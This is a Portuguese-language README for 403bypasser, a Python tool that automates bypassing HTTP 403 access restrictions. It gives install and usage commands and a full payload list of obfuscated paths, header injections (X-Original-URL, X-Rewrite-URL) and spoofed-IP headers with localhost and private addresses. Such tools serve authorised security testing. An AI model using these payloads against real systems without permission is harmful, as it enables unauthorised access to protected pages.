
Automatiza técnicas de bypass de controle de acesso HTTP 403 usando manipulação de cabeçalhos, ofuscação de caminho e conversão de método HTTP para testes de segurança em aplicações web.

403bypasser automatiza as técnicas utilizadas para contornar as restrições de controle de acesso em páginas alvo. Esta ferramenta continuará a ser desenvolvida e está aberta a contribuições.
403bypasser automatiza as técnicas usadas para contornar as restrições de controle de acesso em páginas alvo. O 403bypasser continuará a ser melhorado e está aberto a contribuições.
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txtArgumentos:
| Argumento | Descrição | Exemplos | Nota |
|---|---|---|---|
| -u | URL única para escanear | http://example.com or http://example.com/ | Todos esses exemplos de uso são interpretados da mesma forma |
| -U | caminho para lista de URLs | ./urllist.txt, ../../urllist.txt, etc. | Apenas forneça o caminho onde o arquivo está localizado :) |
| -d | diretório único para escanear | admin or /admin or admin/ or /admin/ | Todos esses exemplos de uso são interpretados da mesma forma |
| -D | caminho para lista de diretórios | ./dirlist.txt, ../../dirlist.txt, etc. | Apenas forneça o caminho onde o arquivo está localizado :) |
Uso 1: python3 403bypasser.py -u https://example.com -d /secret
Uso 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Uso 3: python3 403bypasser.py -U urllist.txt -d /secret
Uso 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
NOTA IMPORTANTE: Todos os seguintes são interpretados da mesma forma. Portanto, qual padrão você usar é apenas uma questão de preferência.
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secretComo Python é uma linguagem multiplataforma, pode-se executar este programa em diferentes sistemas operacionais.
A saída do programa é salva (no diretório atual) em um arquivo com o nome do domínio fornecido como entrada.
Por exemplo:
python3 403bypasser.py -u https://example.com -d /secret é fornecido. Então a saída é salva em example.txt no diretório atual.
Mudanças na v2.0: Mudanças consideráveis foram feitas nesta versão. O projeto foi completamente migrado do Bash para Python 3. Uma variedade nova e ampla de técnicas foi adicionada.
Mudanças na v1.1: Agora é possível passar arquivos (listas) para o 403bypasser como entrada via argumentos. Além disso, dois casos de teste adicionados: envenenamento com os cabeçalhos 1)X-Original-URL e 2)X-Rewrite-URL.
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./X-Original-URL: /secretX-Rewrite-URL: /secretCabeçalhos:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IPValores:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1